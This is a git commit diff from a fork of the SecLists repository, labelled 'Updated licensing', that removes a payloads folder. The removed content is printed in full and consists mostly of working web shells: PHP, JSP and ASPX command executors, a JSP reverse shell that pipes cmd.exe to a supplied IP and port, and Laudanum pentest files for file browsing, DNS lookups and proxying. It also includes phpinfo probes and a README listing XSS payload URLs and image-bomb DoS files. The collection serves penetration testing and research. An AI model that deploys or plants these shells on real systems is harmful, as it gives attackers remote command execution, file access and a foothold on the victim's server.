idan/SecLists
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Updated licensing.

Browse Source
This commit is contained in:
Daniel Miessler
2017-12-19 05:17:27 -08:00
parent c8712654a8
commit b794ed7aaa
53 changed files with 1 additions and 18326660 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Payloads/FUZZDB_Simple.php
-17
View File
@@ -1,17 +0,0 @@
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
Payloads/FUZZDB_cmd.jsp
-35
View File
@@ -1,35 +0,0 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
Payloads/FUZZDB_cmdasp.aspx
-42
View File
@@ -1,42 +0,0 @@
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!-- http://michaeldaw.org 04/2007 -->
Payloads/FUZZDB_jsp-reverse.jsp
-91
View File
@@ -1,91 +0,0 @@
// backdoor.jsp
// http://www.security.org.sg/code/jspreverse.html
<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
% >
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">
IP Address
<input type="text" name="ipaddress" size=30>
Port
<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<hr>
<%
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
%>
<!-- http://michaeldaw.org 2006 -->
Payloads/FUZZDB_list.jsp
-77
View File
@@ -1,77 +0,0 @@
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// list.jsp = Directory & File View
//
// by: Sierra
// modified: 27/06/2003
//
%>
<%
if(request.getParameter("file")==null) {
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<%
}
%>
<% //read the file name.
try {
File f = new File(request.getParameter("file"));
if(f.isDirectory()) {
int i;
String fname = new String("Unknown");
String fcolor = new String("Black");
%>
<HTML><BODY>
<FONT Face="Courier New, Helvetica" Color="Black">
<%
out.print("<B>Path: <U>" + f.toString() + "</U></B><BR> <BR>");
File flist[] = f.listFiles();
for(i=0; i<flist.length; i++) {
fname = new String( flist[i].toString());
out.print("(");
if(flist[i].isDirectory() == true) {
out.print("d");
fname = fname + "/";
fcolor = new String("Blue");
} else if( flist[i].isFile() == true ) {
out.print("-");
fcolor = new String("Green");
} else {
out.print("?");
fcolor = new String("Red");
}
if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
if(flist[i].canWrite() == true) out.print("w" ); else out.print("-");
out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fname.toString() + "'>" + fname.toString() + "</A> " + "( Size: " + flist[i].length() + " bytes)<BR>\n");
}
%>
</FONT></BODY></HTML>
<%
} else {
if(f.canRead() == true) {
InputStream in = new FileInputStream(f);
ServletOutputStream outs = response.getOutputStream();
int left = 0;
try {
while((left) >= 0 ) {
left = in.read();
outs.write(left);
}
} catch(IOException ex) {ex.printStackTrace();}
outs.flush();
outs.close();
in.close();
} else {
out.print("Can't Read file<BR>");
}
}
} catch(Exception ex) {ex.printStackTrace();}
%>
Payloads/PHPInfo/phpinfo-aio.tar
BIN
View File
Binary file not shown.
Payloads/PHPInfo/phpinfo-aio.zip
BIN
View File
Binary file not shown.
Payloads/PHPInfo/phpinfo.php5
-1
View File
@@ -1 +0,0 @@
<?php phpinfo(); ?>
Payloads/PHPInfo/phpinfo.php7
-1
View File
@@ -1 +0,0 @@
<?php phpinfo(); ?>
Payloads/PHPInfo/phpinfo.phpt
-1
View File
@@ -1 +0,0 @@
<?php phpinfo(); ?>
Payloads/PHPInfo/phpinfo.pht
-1
View File
@@ -1 +0,0 @@
<?php phpinfo(); ?>
Payloads/README.md
-47
View File
@@ -1,47 +0,0 @@
## lottapixel
Originally reported at https://hackerone.com/reports/390, addressed on paperclip.
A specially crafted JPEG (the original file was named lottapixel.jpg) causes attempts to determine the dimensions of the image to exhaust available memory. From the original report:
The exploit is really simple. I have an image of 5kb, 260x260 pixels. In the image itself I exchange the 260x260 values with 0xfafa x 0xfafa (so 64250x64250 pixels). Now from what I remember your service tries to convert the image once uploaded. By loading the 'whole image' into memory, it tries to allocate 4128062500 pixels into memory, flooding the memory and causing DoS.
## uber.gif
Current limits
Image size: 1 MB
Image dimensions: 2048x2048px
File types: jpg/png/gif
Another image hack
A GIF composed of 40k 1x1 images made Paperclip freeze until timeout.
As attachments I sent the file composed of 40k images, and a screenshot of the timeout.
## EICAR File
The EICAR Standard Anti-Virus Test File or EICAR test file is a computer file that was developed by the European Institute for Computer Antivirus Research (EICAR) and Computer Antivirus Research Organization (CARO), to test the response of computer antivirus (AV) programs. Instead of using real malware, which could do real damage, this test file allows people to test anti-virus software without having to use a real computer virus.
Anti-virus programmers set the EICAR string as a verified virus, similar to other identified signatures. A compliant virus scanner, when detecting the file, will respond in exactly the same manner as if it found a harmful virus. Not all virus scanners are compliant, and may not detect the file even when they are correctly configured.
The use of the EICAR test string can be more versatile than straightforward detection: a file containing the EICAR test string can be compressed or archived, and then the antivirus software can be run to see whether it can detect the test string in the compressed file.
## xssproject File
As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
Examples:
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(?js=history.go(-1),_self);}
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(invalidfileinvalidfileinvalidfile,target);setTimeout(alert(w.document.location);w.close();,1);
## POC_img_phpinfo File
Outlined here: https://www.secgeek.net/bookfresh-vulnerability/
Payloads/laudanum-0.8/asp/dns.asp
-153
View File
@@ -1,153 +0,0 @@
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to DNS on the system.
' *** Written by Tim Medin <timmedin@gmail.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version.
' ***
' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details.
' ***
' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA.
' ***
' ***************************************************************************** */
' ***************** Config entries below ***********************
' IPs are enterable as individual addresses TODO: add CIDR support
Dim allowedIPs
Dim allowed
Dim qtypes
Dim qtype
Dim validtype
Dim query
Dim i
Dim command
allowedIPs = "192.168.0.1,127.0.0.1"
' Just in cace you added a space in the line above
allowedIPs = replace(allowedIPS," ","")
'turn it into an array
allowedIPs = split(allowedIPS,",") '
' make sure the ip is allowed
allowed = 0
for i = lbound(allowedIPs) to ubound(allowedIPs)
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
allowed = 1
Exit For
end if
next
' send a 404 if not the allowed IP
if allowed = 0 then
Response.Status = "404 File Not Found"
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
Response.End
end if
%>
<html>
<head>
<title>Laudanum ASP DNS Access</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
document.dns.query.focus();
}
</script>
</head>
<body onload="init()">
<h1>DNS Query 0.1</h1>
<%
' dns query types as defined as by windows nslookup
qtypes = split ("ANY,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV",",")
qtype = UCase(Request.Form("type"))
' see if the query type is valid, if it isn't then set it.
validtype = 0
for i = lbound(qtypes) to ubound(qtypes)
if qtype = qtypes(i) then
validtype = 1
Exit For
end if
next
if validtype = 0 then qtype = "ANY"
%>
<form name="dns" method="POST">
<fieldset>
<legend>DNS Lookup:</legend>
<p>Query:<input name="query" type="text">
Type:<select name="type">
<%
for i = lbound(qtypes) to ubound(qtypes)
if qtype = qtypes(i) then
Response.Write("<option value=""" & qtypes(i) & """ SELECTED>" & qtypes(i) & "</option>")
else
Response.Write("<option value=""" & qtypes(i) & """>" & qtypes(i) & "</option>")
end if
next
%>
</select>
<input type="submit" value="Submit">
</fieldset>
</form>
<%
' get the query
query = trim(Request.Form("query"))
' the query must be sanitized a bit to try to make sure the shell doesn't hang
query = replace(query, " ", "")
query = replace(query, ";", "")
if len(query) > 0 then
command = "nslookup -type=" & qtype & " " & query
Set objWShell = Server.CreateObject("WScript.Shell")
Set objCmd = objWShell.Exec(command)
strPResult = objCmd.StdOut.Readall()
set objCmd = nothing: Set objWShell = nothing
%><pre><%
Response.Write command & "<br>"
Response.Write replace(strPResult,vbCrLf,"<br>")
%></pre><%
end if
%>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
Payloads/laudanum-0.8/asp/file.asp
-179
View File
@@ -1,179 +0,0 @@
<%@Language="VBScript"%>
<%Option Explicit%>
<%Response.Buffer = True%>
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access to the file system.
' *** Written by Tim Medin <timmedin@gmail.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version.
' ***
' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details.
' ***
' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA.
' ***
' ***************************************************************************** */
' ***************** Config entries below ***********************
' Define variables
Dim allowedIPs
Dim allowed
Dim filepath
Dim file
Dim stream
Dim path
Dim i
Dim fso
Dim folder
Dim list
Dim temppath
' IPs are enterable as individual addresses TODO: add CIDR support
allowedIPs = "192.168.0.1,127.0.0.1,::1"
' Just in cace you added a space in the line above
allowedIPs = replace(allowedIPS," ","")
'turn it into an array
allowedIPs = split(allowedIPS,",") '
' make sure the ip is allowed
allowed = 0
for i = lbound(allowedIPs) to ubound(allowedIPs)
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
allowed = 1
exit for
end if
next
' send a 404 if the IP Address is not allowed
if allowed = 0 then
Response.Status = "404 File Not Found"
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
Response.End
end if
' create file object for use everywhere
set fso = CreateObject("Scripting.FileSystemObject")
' download a file if selected
filepath = trim(Request.QueryString("file"))
'validate file
if len(filepath) > 0 then
if fso.FileExists(filepath) then
'valid file
Set file = fso.GetFile(filepath)
Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name
'Response.AddHeader "Content-Length", file.Size
Response.ContentType = "application/octet-stream"
set stream = Server.CreateObject("ADODB.Stream")
stream.Open
stream.Type = 1
Response.Charset = "UTF-8"
stream.LoadFromFile(file.Path)
' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb.
Response.BinaryWrite(stream.Read)
stream.Close
set stream = Nothing
set file = Nothing
Response.End
end if
end if
' begin rendering the page
%>
<html>
<head>
<title>Laudanum ASP File Browser</title>
</head>
<body>
<h1>Laudanum File Browser 0.1</h1>
<%
' get the path to work with, if it isn't set or valid then start with the web root
' goofy if statement is used since vbscript doesn't use short-curcuit logic
path = trim(Request.QueryString("path"))
if len(path) = 0 then
path = fso.GetFolder(Server.MapPath("\"))
elseif not fso.FolderExists(path) then
path = fso.GetFolder(Server.MapPath("\"))
end if
set folder = fso.GetFolder(path)
' Special locations, webroot and drives
%><b>Other Locations:</b> <%
for each i in fso.Drives
if i.IsReady then
%><a href="<%=Request.ServerVariables("URL") & "?path=" & i.DriveLetter%>:\"><%=i.DriveLetter%>:</a>&nbsp;&nbsp;<%
end if
next
%><a href="<%=Request.ServerVariables("URL")%>">web root</a><br/><%
' Information on folder
%><h2>Listing of: <%
list = split(folder.path, "\")
temppath = ""
for each i in list
temppath = temppath & i & "\"
%><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(temppath)%>"><%=i%>\</a> <%
next
%></h2><%
' build table for listing
%><table>
<tr><th align="left">Name</th><th>Size</th><th>Modified</th><th>Accessed</th><th>Created</th></tr><%
' Parent Path if it exists
if not folder.IsRootFolder then
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(folder.ParentFolder.Path)%>">..</a></td><%
end if
' Get the folders
set list = folder.SubFolders
for each i in list
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(i.Path)%>"><%=i.Name%>\</a></td></tr><%
next
' Get the files
set list = folder.Files
for each i in list
%><tr><td><a href="<%=Request.ServerVariables("URL") & "?file=" & Server.URLEncode(i.Path)%>"><%=i.Name%></a></td><td align="right"><%=FormatNumber(i.Size, 0)%></td><td align="right"><%=i.DateLastModified%></td><td align="right"><%=i.DateLastAccessed%></td><td align="right"><%=i.DateCreated%></td></tr><%
next
' all done
%>
</table>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
Payloads/laudanum-0.8/asp/proxy.asp
-454
View File
@@ -1,454 +0,0 @@
<%@Language="VBScript"%>
<%Option Explicit%>
<%Response.Buffer = True%>
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** This file provides access as a proxy.
' *** Written by Tim Medin <timmedin@gmail.com>
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version.
' ***
' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
' *** GNU General Public License for more details.
' ***
' *** You can get a copy of the GNU General Public License from this
' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
' *** You can also write to the Free Software Foundation, Inc., Temple
' *** Place - Suite Boston, MA USA.
' ***
' ***************************************************************************** */
' ***************** Config entries below ***********************
' Define variables
Dim allowedIPs
Dim allowed
Dim i
Dim s 'generic string, yeah, I know bad, but at this point I just want it to work
Dim urltemp
Dim urlscheme
Dim urlhost
Dim urlport
Dim urlpath
Dim urlfile
Dim urlquery
Dim http
Dim method
Dim contenttype
Dim stream
Dim regex
Dim body
Dim params
function err_handler()
%>
<html>
<head>
<title>Laudanum ASP Proxy</title>
</head>
<body>
<h1>Fatal Error!</h1>
<%=Err.Number%><br/>
<%=Err.Message%><br/>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html><%
end function
function CleanQueryString
' removes laudurl from the querystring
Dim i
Dim j
Dim s
Dim key
Dim q
if len(request.querystring) = 0 then
CleanQueryString = ""
exit function
end if
' build the request parameters
for i = 1 to request.querystring.count
key = request.querystring.key(i)
'response.write "<br/>key:" & key
if key = "laudurl" then
' if the key is laudurl, we need check if there is a ? in the string since
' it may have its own query string that doesn't get parsed properly.
s = split(request.querystring("laudurl"), "?")
if ubound(s) > lbound(s) then
' laudurl contains a ?, it must be manually parsed
key = left(s(1), instr(s(1), "=") - 1)
q = q & "&" & key & "=" & mid(s(1), len(key) + 2)
end if
else
for j = 1 to request.querystring(key).count
'response.write "<br/> -value:" & request.querystring(key)(j)
q = q & "&" & key & "=" & request.querystring(key)(j)
next
end if
next
if len(q) > 0 then
CleanQueryString = "?" & mid(q, 2)
else
CleanQueryString = ""
end if
end function
function CleanFormValues()
Dim r
Set r = New RegExp
r.IgnoreCase = true
r.Global = true
' remove the laudurl paramater
r.Pattern = "laudurl=[^&]+($|&)"
CleanFormValues = r.Replace(request.form, "")
Set r = nothing
end function
sub ParseUrl()
' parses the url into the global variables
Dim urltemp
Dim url
'get the url, it may be in the querystring for a get or from a form in a post
url = Request.QueryString("laudurl")
if url = "" then
url = Request.Form("laudurl")
end if
if url = "" then
urlscheme = ""
urlhost = ""
urlport = ""
urlpath = ""
urlfile = ""
urlquery = ""
exit sub
end if
' Parse the url and break it into its components
' this is done so it can be used to rewrite the page
' ensure the url has a scheme, if it doesn't then assume http
if instr(url,"://") = 0 then url = "http://" + url
' Get the scheme
urlscheme = split(url, "://")(0) & "://"
' urltemp is used to hold the remainder of the url as each portion is parsed
urltemp = mid(url, len(urlscheme) + 1)
'get the host
if instr(urltemp, "/") = 0 then
' there is no path so all that is left is the host
urlhost = urltemp
urlport = ""
urlpath = "/"
urlfile = ""
urlport = ""
else
' there is more that just the hostname remaining
urlhost = left(urltemp, instr(urltemp, "/") - 1)
urltemp = mid(urltemp, len(urlhost) + 1)
' is there a port
if instr(urlhost, ":") = 0 then
' no port
urlport = ""
else
' there is a port
arr = split(urlhost, ":")
urlhost = arr(0)
urlport = ":" & arr(1)
end if
' all that is left is the path and the query
' is there a query?
if instr(urltemp, "?") = 0 then
' no query
urlpath = urltemp
'urlquery = ""
else
'Response.Write "<br><br>" & urltemp & "<br><br>"
urlpath = left(urltemp, instr(urltemp, "?") - 1)
'urlquery = mid(urltemp, instr(urltemp, "?") + 1)
end if
if right(urlpath, 1) = "/" then
urlfile = ""
else
' we need to get the path and the file
urltemp = split(urlpath, "/")
urlfile = urltemp(ubound(urltemp))
urlpath = left(urlpath, len(urlpath) - len(urlfile))
end if
end if
urlquery = CleanQueryString
'response.write "<br>scheme: " & urlscheme
'response.write "<br>host: " & urlhost
'response.write "<br>port: " & urlport
'response.write "<br>path: " & urlpath
'response.write "<br>file: " & urlfile
'response.write "<br>query: " & urlquery
'response.write "<br>full: " & FullUrl()
'response.end
end sub
function FullUrl()
FullUrl = urlscheme & urlhost & urlport & urlpath & urlfile & urlquery
end function
sub RewriteHeaders()
Dim i
Dim header
Dim headervalue
Dim regexdomain
Dim regexpath
' setup a regular expression to clean the cookie's domain and path
Set regexdomain = New RegExp
regexdomain.IgnoreCase = true
regexdomain.Global = true
' rewrite images and links - absolute reference
regexdomain.Pattern = "domain=[\S]+"
Set regexpath = New RegExp
regexpath.IgnoreCase = true
regexpath.Global = true
' rewrite images and links - absolute reference
regexpath.Pattern = "path=[\S]+"
' go through each header
for each i in Split(http.getAllResponseHeaders, vbLf)
' Break on the \x0a and remove the \x0d if it exists
i = Replace(i, vbCr, "")
' make sure it is a header and value
if instr(i, ":") > 0 then
' break the response headers into header and value
header = trim(Left(i, instr(i, ":") - 1))
header = replace(header, "_", "-")
headervalue = trim(Right(i, len(i) - instr(i, ":")))
' don't add these two header types since they are handled automatically
if lcase(header) <> "content-type" and lcase(header) <> "content-length" and lcase(header) <> "transfer-encoding" then
if lcase(header) = "set-cookie" then
' strip the domain from the cookie
headervalue = regexdomain.replace(headervalue, "")
' strip the path from the cookie
headervalue = regexpath.replace(headervalue, "")
headervalue = trim(headervalue)
end if
response.AddHeader header, headervalue
end if
end if
next
Set regexdomain = nothing
Set regexpath = nothing
end sub
' TODO: Add authentication support so it will work behind a proxy
' IPs are enterable as individual addresses TODO: add CIDR support
allowedIPs = "192.168.0.1,127.0.0.1,::1"
' Just in cace you added a space in the line above
allowedIPs = replace(allowedIPS," ","")
'turn it into an array
allowedIPs = split(allowedIPS,",") '
' make sure the ip is allowed
' TODO: change this to 0 for production, it is 1 for testing
allowed = 0
for i = lbound(allowedIPs) to ubound(allowedIPs)
if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
allowed = 1
exit for
end if
next
' send a 404 if the IP Address is not allowed
if allowed = 0 then
Response.Status = "404 File Not Found"
Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
Response.End
end if
'initialize variables
Set http = nothing
Set regex = nothing
Set stream = nothing
' Define Constants
const useMSXML2 = 0
const chunkSize = 1048576 ' 1MB
' parse the url into its parts
ParseUrl()
' check if there is a valid url
if len(FullUrl) = 0 then
' no url to proxy, give `em the boring default page
' Default layout of the page
' First thing you get when you hit the page without giving it a URL
%>
<html>
<head>
<title>Laudanum ASP Proxy</title>
<script type="text/javascript">
function init() {
document.proxy.url.focus();
}
</script>
</head>
<body onload="init()">
<h1>Laudanum ASP Proxy</h1>
<form method="GET" name="proxy" action="<%=Request.ServerVariables("URL")%>">
<input type="text" name="laudurl" size="70">
<input type="submit" value="Submit">
</form>
<hr/>
<address>
Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html> <%
Response.End()
end if
' Let's get our Proxy on!!!
' define the request type
if useMSXML2 = 1 then
Set http = Server.CreateObject("MSXML2.XMLHTTP")
else
Set http = Server.CreateObject("Microsoft.XMLHTTP")
end if
' get the request type
method = Request.ServerVariables("REQUEST_METHOD")
' setup the request, false means don't send it yet
http.Open method, FullUrl, False
' send the request
if method = "POST" then
params = CleanFormValues
http.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
http.setRequestHeader "Content-length", len(params)
http.setRequestHeader "Connection", "close"
http.Send(params)
else
http.Send
end if
' Replace the normal headers with the ones from the response
Response.Clear
contenttype = http.getResponseHeader("Content-Type")
Response.ContentType = contenttype
' rewrite the headers. Takes headers and passes them to new request
RewriteHeaders()
' how to respond? is it text or is it something else?
if lcase(left(contenttype, 4)) = "text" then
' response is text, so we need to rewrite it, but that's later
' do the rewriting
body = http.responseText
Set regex = New RegExp
regex.IgnoreCase = true
regex.Global = true
' rewrite images and links - absolute reference
s = urlscheme & urlhost & urlport
regex.Pattern = "((src|href).?=.?['""])(\/[^'""]+['""])"
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3")
' rewrite images and links - full reference
regex.Pattern = "((src|href).?=.?['""])(http[^'""]+['""])"
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=$3")
' rewrite images and links - absolute reference
s = urlscheme & urlhost & urlport & urlpath
regex.Pattern = "((src|href).?=.?['""])([^\/][^'""]+['""])"
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3")
' rewrite forms - absolute reference
s = urlscheme & urlhost & urlport
regex.Pattern = "(\<form[^\>]+action.?=.?['""])(\/[^'""]+)(['""][^\>]*[\>])"
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""" & s & "$2"">")
' rewrite forms - full reference
regex.Pattern = "(\<form[^\>]+action.?=.?['""])(http[^'""]+)(['""][^\>]*[\>])"
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""$2"">")
' rewrite forms - absolute reference
s = urlscheme & urlhost & urlport & urlpath
regex.Pattern = "(\<form[^\>]+action.?=.?['""])([^\/][^'""]+)(['""][^\>]*[\>])"
body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""" & s & "$2"">")
Response.Write(body)
Set regex = nothing
else
' some sort of binary response, so stream it
Set stream = nothing
Set stream = Server.CreateObject("ADODB.Stream")
stream.Type = 1 'Binary
stream.Open
stream.Write http.responseBody
stream.Position = 0
For i = 0 to stream.Size \ chunkSize
Response.BinaryWrite(stream.Read(chunkSize))
next
Set stream = nothing
end if
Set http = nothing
Response.End
:HandleError
err_handler
%>
Payloads/laudanum-0.8/asp/shell.asp
-83
View File
@@ -1,83 +0,0 @@
<%
' *******************************************************************************
' ***
' *** Laudanum Project
' *** A Collection of Injectable Files used during a Penetration Test
' ***
' *** More information is available at:
' *** http://laudanum.secureideas.net
' *** laudanum@secureideas.net
' ***
' *** Project Leads:
' *** Kevin Johnson <kjohnson@secureideas.net
' *** Tim Medin <tim@securitywhole.com>
' ***
' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
' ***
' ********************************************************************************
' ***
' *** Updated and fixed by Robin Wood <Digininja>
' *** Updated and fixed by Tim Medin <tim@securitywhole.com
' ***
' ********************************************************************************
' *** This program is free software; you can redistribute it and/or
' *** modify it under the terms of the GNU General Public License
' *** as published by the Free Software Foundation; either version 2
' *** of the License, or (at your option) any later version.
' ***
' *** This program is distributed in the hope that it will be useful,
' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
